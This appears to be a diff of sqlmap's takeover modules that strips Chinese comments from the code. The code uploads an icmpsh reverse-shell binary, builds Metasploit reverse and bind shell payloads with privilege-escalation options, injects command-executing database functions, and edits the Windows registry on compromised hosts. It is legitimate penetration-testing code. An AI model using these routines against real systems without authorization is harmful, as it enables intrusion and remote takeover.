        self.remoteIP = getattr(self, "remoteIP", None)
-        self.lhostStr = ICMPsh._selectLhost(self)  # 获取本地主机地址
-        self.rhostStr = ICMPsh._selectRhost(self)  # 获取远程主机地址
+        self.lhostStr = ICMPsh._selectLhost(self)
+        self.rhostStr = ICMPsh._selectRhost(self)

    def _runIcmpshMaster(self):
-        """
-        在本地运行icmpsh主程序
-        """
        infoMsg = "running icmpsh master locally"
        logger.info(infoMsg)

-        icmpshmaster(self.lhostStr, self.rhostStr)  # 启动icmpsh主程序
+        icmpshmaster(self.lhostStr, self.rhostStr)

    def _runIcmpshSlaveRemote(self):
-        """
-        在远程运行icmpsh从程序
-        """
        infoMsg = "running icmpsh slave remotely"
        logger.info(infoMsg)

-        # 构建命令行参数: -t指定目标IP, -d指定延迟, -b指定缓冲区大小, -s指定数据大小
        cmd = "%s -t %s -d 500 -b 30 -s 128 &" % (self._icmpslaveRemote, self.lhostStr)

-        self.execCmd(cmd, silent=True)  # 执行命令
+        self.execCmd(cmd, silent=True)

    def uploadIcmpshSlave(self, web=False):
-        """
-        上传icmpsh从程序到目标机器
-        参数:
-            web: 是否通过web方式上传
-        返回:
-            上传是否成功
-        """
        ICMPsh._initVars(self)
-        self._randStr = randomStr(lowercase=True)  # 生成随机字符串
-        self._icmpslaveRemoteBase = "tmpi%s.exe" % self._randStr  # 生成临时文件名
+        self._randStr = randomStr(lowercase=True)
+        self._icmpslaveRemoteBase = "tmpi%s.exe" % self._randStr

-        # 构建远程文件完整路径
        self._icmpslaveRemote = "%s/%s" % (conf.tmpPath, self._icmpslaveRemoteBase)
        self._icmpslaveRemote = ntToPosixSlashes(normalizePath(self._icmpslaveRemote))

        logger.info("uploading icmpsh slave to '%s'" % self._icmpslaveRemote)

-        if web:  # 通过web方式上传
+        if web:
            written = self.webUpload(self._icmpslaveRemote, os.path.split(self._icmpslaveRemote)[0], filepath=self._icmpslave)
-        else:  # 通过其他方式上传
+        else:
            written = self.writeFile(self._icmpslave, self._icmpslaveRemote, "binary", forceCheck=True)

        if written is not True:
-            # 上传失败的错误提示
            errMsg = "there has been a problem uploading icmpsh, it "
            errMsg += "looks like the binary file has not been written "
            errMsg += "on the database underlying file system or an AV has "
@ -160,18 +127,14 @@ class ICMPsh(object):
            return True

    def icmpPwn(self):
-        """
-        执行ICMP shell攻击的主函数
-        """
-        ICMPsh._prepareIngredients(self)  # 准备参数
-        self._runIcmpshSlaveRemote()  # 运行远程从程序
-        self._runIcmpshMaster()  # 运行本地主程序
+        ICMPsh._prepareIngredients(self)
+        self._runIcmpshSlaveRemote()
+        self._runIcmpshMaster()

        debugMsg = "icmpsh master exited"
        logger.debug(debugMsg)

        time.sleep(1)
-        # 清理远程机器上的进程和文件
        self.execCmd("taskkill /F /IM %s" % self._icmpslaveRemoteBase, silent=True)
        time.sleep(1)
        self.delRemoteFile(self._icmpslaveRemote)
--- a/src/sqlmap-master/lib/takeover/metasploit.py
+++ b/src/sqlmap-master/lib/takeover/metasploit.py
@ -259,36 +259,24 @@ class Metasploit(object):
        return _payloadStr

    def _selectPort(self):
-        # 遍历_portData字典中的键值对
        for connType, connStr in self._portData.items():
-            # 如果connectionStr以connType开头
            if self.connectionStr.startswith(connType):
-                # 返回_skeletonSelection函数的返回值，maxValue为65535，default为1025到65535之间的随机数
                return self._skeletonSelection(connStr, maxValue=65535, default=randomRange(1025, 65535))

    def _selectRhost(self):
-        # 如果connectionStr以"bind"开头
        if self.connectionStr.startswith("bind"):
-            # 提示用户输入后端DBMS地址，默认为remoteIP
            message = "what is the back-end DBMS address? [Enter for '%s' (detected)] " % self.remoteIP
            address = readInput(message, default=self.remoteIP)

-            # 如果用户没有输入地址
            if not address:
-                # 将地址设为remoteIP
                address = self.remoteIP

-            # 返回地址
            return address

-        # 如果connectionStr以"reverse"开头
        elif self.connectionStr.startswith("reverse"):
-            # 返回None
            return None

-        # 如果connectionStr不以"bind"或"reverse"开头
        else:
-            # 抛出SqlmapDataException异常
            raise SqlmapDataException("unexpected connection type")

    def _selectLhost(self):
@ -308,11 +296,9 @@ class Metasploit(object):
            raise SqlmapDataException("unexpected connection type")

    def _selectConnection(self):
-        # 选择连接类型
        return self._skeletonSelection("connection type", self._msfConnectionsList)

    def _prepareIngredients(self, encode=True):
-        # 准备食材
        self.connectionStr = self._selectConnection()
        self.lhostStr = self._selectLhost()
        self.rhostStr = self._selectRhost()
@ -322,13 +308,11 @@ class Metasploit(object):
        self.payloadConnStr = "%s/%s" % (self.payloadStr, self.connectionStr)

    def _forgeMsfCliCmd(self, exitfunc="process"):
-        # 构造Metasploit命令行
        if kb.oldMsf:
            self._cliCmd = "%s multi/handler PAYLOAD=%s" % (self._msfCli, self.payloadConnStr)
            self._cliCmd += " EXITFUNC=%s" % exitfunc
            self._cliCmd += " LPORT=%s" % self.portStr

-            # 根据连接类型选择LHOST或RHOST
            if self.connectionStr.startswith("bind"):
                self._cliCmd += " RHOST=%s" % self.rhostStr
            elif self.connectionStr.startswith("reverse"):
@ -336,7 +320,6 @@ class Metasploit(object):
            else:
                raise SqlmapDataException("unexpected connection type")

-            # 如果是Windows系统且payload为windows/vncinject，则添加DisableCourtesyShell参数
            if Backend.isOs(OS.WINDOWS) and self.payloadStr == "windows/vncinject":
                self._cliCmd += " DisableCourtesyShell=true"

@ -393,54 +376,39 @@ class Metasploit(object):
            self._cliCmd += "; exploit'"

    def _forgeMsfPayloadCmd(self, exitfunc, format, outFile, extra=None):
-        # 根据kb.oldMsf的值，设置self._payloadCmd的值
        if kb.oldMsf:
            self._payloadCmd = self._msfPayload
        else:
            self._payloadCmd = "%s -p" % self._msfVenom

-        # 添加payload连接字符串
        self._payloadCmd += " %s" % self.payloadConnStr
-        # 添加退出函数
        self._payloadCmd += " EXITFUNC=%s" % exitfunc
-        # 添加监听端口
        self._payloadCmd += " LPORT=%s" % self.portStr

-        # 根据连接类型，添加监听主机
        if self.connectionStr.startswith("reverse"):
            self._payloadCmd += " LHOST=%s" % self.lhostStr
        elif not self.connectionStr.startswith("bind"):
            raise SqlmapDataException("unexpected connection type")

-        # 如果是Linux系统，并且开启了提权选项，则添加PrependChrootBreak和PrependSetuid参数
        if Backend.isOs(OS.LINUX) and conf.privEsc:
            self._payloadCmd += " PrependChrootBreak=true PrependSetuid=true"

-        # 根据kb.oldMsf的值，设置self._payloadCmd的值
        if kb.oldMsf:
-            # 如果extra参数为BufferRegister=EAX，则添加msfEncode编码器，并设置输出文件和格式
            if extra == "BufferRegister=EAX":
                self._payloadCmd += " R | %s -a x86 -e %s -o \"%s\" -t %s" % (self._msfEncode, self.encoderStr, outFile, format)

-                # 如果extra参数不为空，则添加extra参数
                if extra is not None:
                    self._payloadCmd += " %s" % extra
-            # 否则，设置输出文件
            else:
                self._payloadCmd += " X > \"%s\"" % outFile
-        # 否则，设置输出文件和格式
        else:
-            # 如果extra参数为BufferRegister=EAX，则添加msfEncode编码器，并设置输出文件和格式
            if extra == "BufferRegister=EAX":
                self._payloadCmd += " -a x86 -e %s -f %s" % (self.encoderStr, format)

-                # 如果extra参数不为空，则添加extra参数
                if extra is not None:
                    self._payloadCmd += " %s" % extra

-                # 设置输出文件
                self._payloadCmd += " > \"%s\"" % outFile
-            # 否则，设置输出文件和格式
            else:
                self._payloadCmd += " -f exe > \"%s\"" % outFile

@ -613,57 +581,39 @@ class Metasploit(object):
                pass

    def createMsfShellcode(self, exitfunc, format, extra, encode):
-        # 创建Metasploit Framework多阶段shellcode
        infoMsg = "creating Metasploit Framework multi-stage shellcode "
        logger.info(infoMsg)

-        # 生成随机字符串
        self._randStr = randomStr(lowercase=True)
-        # 生成shellcode文件路径
        self._shellcodeFilePath = os.path.join(conf.outputPath, "tmpm%s" % self._randStr)

-        # 初始化Metasploit变量
        Metasploit._initVars(self)
-        # 准备shellcode的成分
        self._prepareIngredients(encode=encode)
-        # 生成Metasploit payload命令
        self._forgeMsfPayloadCmd(exitfunc, format, self._shellcodeFilePath, extra)

-        # 执行本地命令
        logger.debug("executing local command: %s" % self._payloadCmd)
        process = execute(self._payloadCmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE, close_fds=False)

-        # 输出创建进度
        dataToStdout("\r[%s] [INFO] creation in progress " % time.strftime("%X"))
-        # 检查进程状态
        pollProcess(process)
-        # 获取进程错误输出
        payloadStderr = process.communicate()[1]

-        # 搜索shellcode大小
        match = re.search(b"(Total size:|Length:|succeeded with size|Final size of exe file:) ([\\d]+)", payloadStderr)

        if match:
-            # 获取shellcode大小
            payloadSize = int(match.group(2))

-            # 如果extra参数为BufferRegister=EAX，则将shellcode大小除以2
            if extra == "BufferRegister=EAX":
                payloadSize = payloadSize // 2

-            # 输出shellcode大小
            debugMsg = "the shellcode size is %d bytes" % payloadSize
            logger.debug(debugMsg)
        else:
-            # 如果没有找到shellcode大小，则抛出异常
            errMsg = "failed to create the shellcode ('%s')" % getText(payloadStderr).replace("\n", " ").replace("\r", "")
            raise SqlmapFilePathException(errMsg)

-        # 打开shellcode文件
        self._shellcodeFP = open(self._shellcodeFilePath, "rb")
-        # 读取shellcode文件内容
        self.shellcodeString = getText(self._shellcodeFP.read())
-        # 关闭shellcode文件
        self._shellcodeFP.close()

        os.unlink(self._shellcodeFilePath)
@ -709,7 +659,6 @@ class Metasploit(object):
            return True

    def pwn(self, goUdf=False):
-        # 如果goUdf为True，则使用thread作为退出函数，否则使用process作为退出函数
        if goUdf:
            exitfunc = "thread"
            func = self._runMsfShellcodeRemote
@ -717,52 +666,40 @@ class Metasploit(object):
            exitfunc = "process"
            func = self._runMsfShellcodeRemoteViaSexec

-        # 运行Metasploit命令行界面
        self._runMsfCli(exitfunc=exitfunc)

-        # 如果连接字符串以bind开头，则运行func函数
        if self.connectionStr.startswith("bind"):
            func()

-        # 记录Metasploit命令行界面退出的返回码
        debugMsg = "Metasploit Framework command line interface exited "
        debugMsg += "with return code %s" % self._controlMsfCmd(self._msfCliProc, func)
        logger.debug(debugMsg)

-        # 如果goUdf为False，则等待1秒，并删除远程文件
        if not goUdf:
            time.sleep(1)
            self.delRemoteFile(self.shellcodeexecRemote)

    def smb(self):
-        # 初始化Metasploit变量
        Metasploit._initVars(self)
-        # 生成随机文件名
        self._randFile = "tmpu%s.txt" % randomStr(lowercase=True)

-        # 运行Metasploit命令行界面
        self._runMsfCliSmbrelay()

-        # 如果识别的数据库管理系统是MySQL或PGSQL，则使用UNC路径
        if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
            self.uncPath = r"\\\\%s\\%s" % (self.lhostStr, self._randFile)
        else:
            self.uncPath = r"\\%s\%s" % (self.lhostStr, self._randFile)

-        # 记录Metasploit命令行界面退出的返回码
        debugMsg = "Metasploit Framework console exited with return "
        debugMsg += "code %s" % self._controlMsfCmd(self._msfCliProc, self.uncPathRequest)
        logger.debug(debugMsg)

    def bof(self):
-        # 运行Metasploit命令行界面
        self._runMsfCli(exitfunc="seh")

-        # 如果连接字符串以bind开头，则运行spHeapOverflow函数
        if self.connectionStr.startswith("bind"):
            self.spHeapOverflow()

-        # 记录Metasploit命令行界面退出的返回码
        debugMsg = "Metasploit Framework command line interface exited "
        debugMsg += "with return code %s" % self._controlMsfCmd(self._msfCliProc, self.spHeapOverflow)
        logger.debug(debugMsg)
--- a/src/sqlmap-master/lib/takeover/registry.py
+++ b/src/sqlmap-master/lib/takeover/registry.py
@ -5,184 +5,114 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

-# 导入所需的模块
 import os

-# 导入自定义的工具函数
-from lib.core.common import openFile  # 用于打开文件
-from lib.core.common import randomStr  # 用于生成随机字符串
-from lib.core.data import conf  # 配置信息
-from lib.core.data import logger  # 日志记录器
-from lib.core.enums import REGISTRY_OPERATION  # 注册表操作类型的枚举
+from lib.core.common import openFile
+from lib.core.common import randomStr
+from lib.core.data import conf
+from lib.core.data import logger
+from lib.core.enums import REGISTRY_OPERATION

 class Registry(object):
    """
-    这个类定义了读取和写入Windows注册表键值的方法。
-    注册表是Windows系统中的一个核心数据库，用于存储系统和应用程序的配置信息。
+    This class defines methods to read and write Windows registry keys
    """

    def _initVars(self, regKey, regValue, regType=None, regData=None, parse=False):
-        """
-        初始化注册表操作所需的变量
-        :param regKey: 注册表键路径，例如"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows"
-        :param regValue: 注册表值名称，即要操作的具体配置项名称
-        :param regType: 注册表值类型，如REG_SZ(字符串)、REG_DWORD(数字)等
-        :param regData: 要写入的注册表值数据
-        :param parse: 是否需要解析输出，True表示需要特殊处理输出格式
-        """
-        # 保存传入的参数
        self._regKey = regKey
        self._regValue = regValue
        self._regType = regType
        self._regData = regData

-        # 生成一个随机字符串，用于创建临时批处理文件名
        self._randStr = randomStr(lowercase=True)
-        # 设置远程系统上临时批处理文件的路径
        self._batPathRemote = "%s/tmpr%s.bat" % (conf.tmpPath, self._randStr)
-        # 设置本地系统上临时批处理文件的路径
        self._batPathLocal = os.path.join(conf.outputPath, "tmpr%s.bat" % self._randStr)

-        # 根据parse参数决定读取命令的格式
        if parse:
-            # 使用FOR循环解析REG QUERY的输出，可以获得更规范的格式
            readParse = "FOR /F \"tokens=*\" %%A IN ('REG QUERY \"" + self._regKey + "\" /v \"" + self._regValue + "\"') DO SET value=%%A\r\nECHO %value%\r\n"
        else:
-            # 直接使用REG QUERY命令查询注册表
            readParse = "REG QUERY \"" + self._regKey + "\" /v \"" + self._regValue + "\""

-        # 定义用于读取注册表的批处理命令
        self._batRead = (
-            "@ECHO OFF\r\n",  # 关闭命令回显
-            readParse,  # 实际的查询命令
+            "@ECHO OFF\r\n",
+            readParse,
        )

-        # 定义用于添加注册表值的批处理命令
        self._batAdd = (
            "@ECHO OFF\r\n",
-            "REG ADD \"%s\" /v \"%s\" /t %s /d %s /f" % (self._regKey, self._regValue, self._regType, self._regData),  # /f表示强制覆盖不提示
+            "REG ADD \"%s\" /v \"%s\" /t %s /d %s /f" % (self._regKey, self._regValue, self._regType, self._regData),
        )

-        # 定义用于删除注册表值的批处理命令
        self._batDel = (
            "@ECHO OFF\r\n",
-            "REG DELETE \"%s\" /v \"%s\" /f" % (self._regKey, self._regValue),  # /f表示强制删除不提示
+            "REG DELETE \"%s\" /v \"%s\" /f" % (self._regKey, self._regValue),
        )

    def _createLocalBatchFile(self):
-        """
-        在本地系统创建临时批处理文件
-        这个批处理文件包含了要在远程系统执行的注册表操作命令
-        """
-        # 以写入模式打开本地临时文件
        self._batPathFp = openFile(self._batPathLocal, "w")

-        # 根据操作类型选择相应的命令集
        if self._operation == REGISTRY_OPERATION.READ:
-            lines = self._batRead  # 读取操作的命令
+            lines = self._batRead
        elif self._operation == REGISTRY_OPERATION.ADD:
-            lines = self._batAdd  # 添加操作的命令
+            lines = self._batAdd
        elif self._operation == REGISTRY_OPERATION.DELETE:
-            lines = self._batDel  # 删除操作的命令
+            lines = self._batDel

-        # 将命令写入批处理文件
        for line in lines:
            self._batPathFp.write(line)

-        # 关闭文件
        self._batPathFp.close()

    def _createRemoteBatchFile(self):
-        """
-        在远程系统创建批处理文件
-        这个方法会先在本地创建文件，然后将其复制到远程系统
-        """
-        # 记录调试信息
        logger.debug("creating batch file '%s'" % self._batPathRemote)

-        # 先在本地创建批处理文件
        self._createLocalBatchFile()
-        # 将本地文件复制到远程系统
        self.writeFile(self._batPathLocal, self._batPathRemote, "text", forceCheck=True)

-        # 删除本地的临时文件
        os.unlink(self._batPathLocal)

    def readRegKey(self, regKey, regValue, parse=False):
-        """
-        读取注册表键值的方法
-        :param regKey: 要读取的注册表键路径
-        :param regValue: 要读取的值名称
-        :param parse: 是否需要解析输出
-        :return: 返回读取到的注册表值内容
-        """
-        # 设置操作类型为读取
        self._operation = REGISTRY_OPERATION.READ

-        # 初始化变量并创建远程批处理文件
        Registry._initVars(self, regKey, regValue, parse=parse)
        self._createRemoteBatchFile()

-        # 记录调试信息
        logger.debug("reading registry key '%s' value '%s'" % (regKey, regValue))

-        # 在远程系统执行批处理文件并获取输出
        data = self.evalCmd(self._batPathRemote)

-        # 如果不需要解析，则处理输出格式（去除前导空格）
        if data and not parse:
            pattern = '    '
            index = data.find(pattern)
            if index != -1:
                data = data[index + len(pattern):]

-        # 清理：删除远程临时文件
        self.delRemoteFile(self._batPathRemote)

        return data

    def addRegKey(self, regKey, regValue, regType, regData):
-        """
-        添加或修改注册表键值
-        :param regKey: 要添加的注册表键路径
-        :param regValue: 要添加的值名称
-        :param regType: 值的类型（如REG_SZ, REG_DWORD等）
-        :param regData: 要写入的数据
-        """
-        # 设置操作类型为添加
        self._operation = REGISTRY_OPERATION.ADD

-        # 初始化变量并创建远程批处理文件
        Registry._initVars(self, regKey, regValue, regType, regData)
        self._createRemoteBatchFile()

-        # 构造并记录调试信息
        debugMsg = "adding registry key value '%s' " % self._regValue
        debugMsg += "to registry key '%s'" % self._regKey
        logger.debug(debugMsg)

-        # 执行远程批处理文件并清理
        self.execCmd(cmd=self._batPathRemote)
        self.delRemoteFile(self._batPathRemote)

    def delRegKey(self, regKey, regValue):
-        """
-        删除注册表键值
-        :param regKey: 要删除的注册表键路径
-        :param regValue: 要删除的值名称
-        """
-        # 设置操作类型为删除
        self._operation = REGISTRY_OPERATION.DELETE

-        # 初始化变量并创建远程批处理文件
        Registry._initVars(self, regKey, regValue)
        self._createRemoteBatchFile()

-        # 构造并记录调试信息
        debugMsg = "deleting registry key value '%s' " % self._regValue
        debugMsg += "from registry key '%s'" % self._regKey
        logger.debug(debugMsg)

-        # 执行远程批处理文件并清理
        self.execCmd(cmd=self._batPathRemote)
        self.delRemoteFile(self._batPathRemote)
--- a/src/sqlmap-master/lib/takeover/udf.py
+++ b/src/sqlmap-master/lib/takeover/udf.py
@ -5,7 +5,6 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

-# 导入所需的模块
 import os

 from lib.core.agent import agent
@ -33,38 +32,28 @@ from lib.request import inject

 class UDF(object):
    """
-    这个类定义了处理用户自定义函数(UDF)的方法。
-    用户自定义函数是数据库中由用户创建的函数,可以扩展数据库的功能。
+    This class defines methods to deal with User-Defined Functions for
+    plugins.
    """

    def __init__(self):
-        # 初始化三个集合/字典来跟踪UDF状态
-        self.createdUdf = set()  # 存储已创建的UDF
-        self.udfs = {}          # 存储UDF的详细信息
-        self.udfToCreate = set() # 存储待创建的UDF
+        self.createdUdf = set()
+        self.udfs = {}
+        self.udfToCreate = set()

    def _askOverwriteUdf(self, udf):
-        """
-        询问用户是否要覆盖已存在的UDF
-        """
        message = "UDF '%s' already exists, do you " % udf
        message += "want to overwrite it? [y/N] "

        return readInput(message, default='N', boolean=True)

    def _checkExistUdf(self, udf):
-        """
-        检查指定的UDF是否已经存在于数据库中
-        """
        logger.info("checking if UDF '%s' already exist" % udf)

        query = agent.forgeCaseStatement(queries[Backend.getIdentifiedDbms()].check_udf.query % (udf, udf))
        return inject.getValue(query, resumeValue=False, expected=EXPECTED.BOOL, charsetType=CHARSET_TYPE.BINARY)

    def udfCheckAndOverwrite(self, udf):
-        """
-        检查UDF是否存在,并询问是否覆盖
-        """
        exists = self._checkExistUdf(udf)
        overwrite = True

@ -75,18 +64,12 @@ class UDF(object):
            self.udfToCreate.add(udf)

    def udfCreateSupportTbl(self, dataType):
-        """
-        为UDF创建支持表
-        """
        debugMsg = "creating a support table for user-defined functions"
        logger.debug(debugMsg)

        self.createSupportTbl(self.cmdTblName, self.tblField, dataType)

    def udfForgeCmd(self, cmd):
-        """
-        格式化命令字符串,确保命令两端有单引号
-        """
        if not cmd.startswith("'"):
            cmd = "'%s" % cmd

@ -96,12 +79,6 @@ class UDF(object):
        return cmd

    def udfExecCmd(self, cmd, silent=False, udfName=None):
-        """
-        执行UDF命令
-        @param cmd: 要执行的命令
-        @param silent: 是否静默执行
-        @param udfName: UDF名称,默认为sys_exec
-        """
        if udfName is None:
            udfName = "sys_exec"

@ -110,13 +87,6 @@ class UDF(object):
        return inject.goStacked("SELECT %s(%s)" % (udfName, cmd), silent)

    def udfEvalCmd(self, cmd, first=None, last=None, udfName=None):
-        """
-        评估并执行UDF命令,并返回结果
-        @param cmd: 要执行的命令
-        @param first: 结果的起始位置
-        @param last: 结果的结束位置
-        @param udfName: UDF名称,默认为sys_eval
-        """
        if udfName is None:
            udfName = "sys_eval"

@ -140,9 +110,6 @@ class UDF(object):
        return output

    def udfCheckNeeded(self):
-        """
-        检查哪些系统UDF是需要的,移除不需要的UDF
-        """
        if (not any((conf.fileRead, conf.commonFiles)) or (any((conf.fileRead, conf.commonFiles)) and not Backend.isDbms(DBMS.PGSQL))) and "sys_fileread" in self.sysUdfs:
            self.sysUdfs.pop("sys_fileread")

@ -156,34 +123,20 @@ class UDF(object):
                self.sysUdfs.pop("sys_exec")

    def udfSetRemotePath(self):
-        """
-        设置UDF在远程服务器上的路径(需要在插件中实现)
-        """
        errMsg = "udfSetRemotePath() method must be defined within the plugin"
        raise SqlmapUnsupportedFeatureException(errMsg)

    def udfSetLocalPaths(self):
-        """
-        设置UDF在本地的路径(需要在插件中实现)
-        """
        errMsg = "udfSetLocalPaths() method must be defined within the plugin"
        raise SqlmapUnsupportedFeatureException(errMsg)

    def udfCreateFromSharedLib(self, udf, inpRet):
-        """
-        从共享库创建UDF(需要在插件中实现)
-        """
        errMsg = "udfCreateFromSharedLib() method must be defined within the plugin"
        raise SqlmapUnsupportedFeatureException(errMsg)

    def udfInjectCore(self, udfDict):
-        """
-        UDF注入的核心方法
-        @param udfDict: UDF字典,包含要注入的UDF信息
-        """
        written = False

-        # 检查每个UDF是否需要覆盖
        for udf in udfDict.keys():
            if udf in self.createdUdf:
                continue
@ -211,12 +164,10 @@ class UDF(object):
        else:
            return True

-        # 创建每个UDF
        for udf, inpRet in udfDict.items():
            if udf in self.udfToCreate and udf not in self.createdUdf:
                self.udfCreateFromSharedLib(udf, inpRet)

-        # 根据数据库类型创建支持表
        if Backend.isDbms(DBMS.MYSQL):
            supportTblType = "longtext"
        elif Backend.isDbms(DBMS.PGSQL):
@ -227,25 +178,16 @@ class UDF(object):
        return written

    def udfInjectSys(self):
-        """
-        注入系统UDF
-        """
        self.udfSetLocalPaths()
        self.udfCheckNeeded()
        return self.udfInjectCore(self.sysUdfs)

    def udfInjectCustom(self):
-        """
-        注入自定义UDF的主要方法
-        包含了用户交互、参数验证、UDF创建和执行等完整流程
-        """
-        # 检查数据库类型是否支持UDF
        if Backend.getIdentifiedDbms() not in (DBMS.MYSQL, DBMS.PGSQL):
            errMsg = "UDF injection feature only works on MySQL and PostgreSQL"
            logger.error(errMsg)
            return

-        # 检查是否支持堆叠查询
        if not isStackingAvailable() and not conf.direct:
            errMsg = "UDF injection feature requires stacked queries SQL injection"
            logger.error(errMsg)
@ -253,13 +195,11 @@ class UDF(object):

        self.checkDbmsOs()

-        # 检查用户权限
        if not self.isDba():
            warnMsg = "functionality requested probably does not work because "
            warnMsg += "the current session user is not a database administrator"
            logger.warning(warnMsg)

-        # 获取共享库路径
        if not conf.shLib:
            msg = "what is the local path of the shared library? "

@ -273,7 +213,6 @@ class UDF(object):
        else:
            self.udfLocalFile = conf.shLib

-        # 验证共享库文件
        if not os.path.exists(self.udfLocalFile):
            errMsg = "the specified shared library file does not exist"
            raise SqlmapFilePathException(errMsg)
@ -292,11 +231,9 @@ class UDF(object):
            errMsg += "but the database underlying operating system is Linux"
            raise SqlmapMissingMandatoryOptionException(errMsg)

-        # 获取共享库名称和扩展名
        self.udfSharedLibName = os.path.basename(self.udfLocalFile).split(".")[0]
        self.udfSharedLibExt = os.path.basename(self.udfLocalFile).split(".")[1]

-        # 获取要创建的UDF数量
        msg = "how many user-defined functions do you want to create "
        msg += "from the shared library? "

@ -314,7 +251,6 @@ class UDF(object):
            else:
                logger.warning("invalid value, only digits are allowed")

-        # 循环获取每个UDF的信息
        for x in xrange(0, udfCount):
            while True:
                msg = "what is the name of the UDF number %d? " % (x + 1)
@ -326,7 +262,6 @@ class UDF(object):
                else:
                    logger.warning("you need to specify the name of the UDF")

-            # 设置默认返回类型
            if Backend.isDbms(DBMS.MYSQL):
                defaultType = "string"
            elif Backend.isDbms(DBMS.PGSQL):
@ -334,7 +269,6 @@ class UDF(object):

            self.udfs[udfName]["input"] = []

-            # 获取输入参数数量
            msg = "how many input parameters takes UDF "
            msg += "'%s'? (default: 1) " % udfName

@ -348,7 +282,6 @@ class UDF(object):
                else:
                    logger.warning("invalid value, only digits >= 0 are allowed")

-            # 获取每个输入参数的类型
            for y in xrange(0, parCount):
                msg = "what is the data-type of input parameter "
                msg += "number %d? (default: %s) " % ((y + 1), defaultType)
@ -363,7 +296,6 @@ class UDF(object):
                        self.udfs[udfName]["input"].append(parType)
                        break

-            # 获取返回值类型
            msg = "what is the data-type of the return "
            msg += "value? (default: %s) " % defaultType

@ -376,14 +308,12 @@ class UDF(object):
                    self.udfs[udfName]["return"] = retType
                    break

-        # 注入UDF
        success = self.udfInjectCore(self.udfs)

        if success is False:
            self.cleanup(udfDict=self.udfs)
            return False

-        # 询问是否要调用注入的UDF
        msg = "do you want to call your injected user-defined "
        msg += "functions now? [Y/n/q] "
        choice = readInput(msg, default='Y').upper()
@ -395,7 +325,6 @@ class UDF(object):
            self.cleanup(udfDict=self.udfs)
            raise SqlmapUserQuitException

-        # 循环调用UDF
        while True:
            udfList = []
            msg = "which UDF do you want to call?"
@ -422,7 +351,6 @@ class UDF(object):
            if not isinstance(choice, int):
                break

-            # 构建UDF调用命令
            cmd = ""
            count = 1
            udfToCall = udfList[choice - 1]
@ -450,7 +378,6 @@ class UDF(object):
            msg = "do you want to retrieve the return value of the "
            msg += "UDF? [Y/n] "

-            # 执行UDF并获取返回值
            if readInput(msg, default='Y', boolean=True):
                output = self.udfEvalCmd(cmd, udfName=udfToCall)

@ -466,5 +393,4 @@ class UDF(object):
            if not readInput(msg, default='Y', boolean=True):
                break

-        # 清理UDF
        self.cleanup(udfDict=self.udfs)
--- a/src/sqlmap-master/lib/takeover/web.py
+++ b/src/sqlmap-master/lib/takeover/web.py
@ -5,90 +5,76 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

-# 导入所需的标准库
 import io
 import os
 import posixpath
 import re
 import tempfile

-# 导入自定义模块和第三方库
-from extra.cloak.cloak import decloak  # 用于解密混淆的文件
-from lib.core.agent import agent  # SQL注入代理模块
-from lib.core.common import arrayizeValue  # 将值转换为数组
-from lib.core.common import Backend  # 后端DBMS信息
-from lib.core.common import extractRegexResult  # 正则提取结果
-from lib.core.common import getAutoDirectories  # 获取自动检测的目录
-from lib.core.common import getManualDirectories  # 获取手动指定的目录
-from lib.core.common import getPublicTypeMembers  # 获取类的公共成员
-from lib.core.common import getSQLSnippet  # 获取SQL代码片段
-from lib.core.common import getTechnique  # 获取注入技术
-from lib.core.common import getTechniqueData  # 获取注入技术数据
-from lib.core.common import isDigit  # 判断是否为数字
-from lib.core.common import isTechniqueAvailable  # 判断注入技术是否可用
-from lib.core.common import isWindowsDriveLetterPath  # 判断是否为Windows驱动器路径
-from lib.core.common import normalizePath  # 规范化路径
-from lib.core.common import ntToPosixSlashes  # Windows路径转POSIX路径
-from lib.core.common import openFile  # 打开文件
-from lib.core.common import parseFilePaths  # 解析文件路径
-from lib.core.common import posixToNtSlashes  # POSIX路径转Windows路径
-from lib.core.common import randomInt  # 生成随机整数
-from lib.core.common import randomStr  # 生成随机字符串
-from lib.core.common import readInput  # 读取用户输入
-from lib.core.common import singleTimeWarnMessage  # 单次警告消息
-from lib.core.compat import xrange  # 兼容Python2/3的range
-from lib.core.convert import encodeHex  # 十六进制编码
-from lib.core.convert import getBytes  # 获取字节串
-from lib.core.convert import getText  # 获取文本
-from lib.core.convert import getUnicode  # 获取Unicode字符串
-from lib.core.data import conf  # 配置数据
-from lib.core.data import kb  # 知识库数据
-from lib.core.data import logger  # 日志记录器
-from lib.core.data import paths  # 路径信息
-from lib.core.datatype import OrderedSet  # 有序集合
-from lib.core.enums import DBMS  # 数据库管理系统枚举
-from lib.core.enums import HTTP_HEADER  # HTTP头部枚举
-from lib.core.enums import OS  # 操作系统枚举
-from lib.core.enums import PAYLOAD  # 载荷类型枚举
-from lib.core.enums import PLACE  # 注入位置枚举
-from lib.core.enums import WEB_PLATFORM  # Web平台枚举
-from lib.core.exception import SqlmapNoneDataException  # sqlmap异常类
-from lib.core.settings import BACKDOOR_RUN_CMD_TIMEOUT  # 后门命令执行超时设置
-from lib.core.settings import EVENTVALIDATION_REGEX  # ASP.NET事件验证正则
-from lib.core.settings import SHELL_RUNCMD_EXE_TAG  # Shell运行命令可执行文件标签
-from lib.core.settings import SHELL_WRITABLE_DIR_TAG  # Shell可写目录标签
-from lib.core.settings import VIEWSTATE_REGEX  # ASP.NET视图状态正则
-from lib.request.connect import Connect as Request  # HTTP请求类
-from thirdparty.six.moves import urllib as _urllib  # URL处理库
+from extra.cloak.cloak import decloak
+from lib.core.agent import agent
+from lib.core.common import arrayizeValue
+from lib.core.common import Backend
+from lib.core.common import extractRegexResult
+from lib.core.common import getAutoDirectories
+from lib.core.common import getManualDirectories
+from lib.core.common import getPublicTypeMembers
+from lib.core.common import getSQLSnippet
+from lib.core.common import getTechnique
+from lib.core.common import getTechniqueData
+from lib.core.common import isDigit
+from lib.core.common import isTechniqueAvailable
+from lib.core.common import isWindowsDriveLetterPath
+from lib.core.common import normalizePath
+from lib.core.common import ntToPosixSlashes
+from lib.core.common import openFile
+from lib.core.common import parseFilePaths
+from lib.core.common import posixToNtSlashes
+from lib.core.common import randomInt
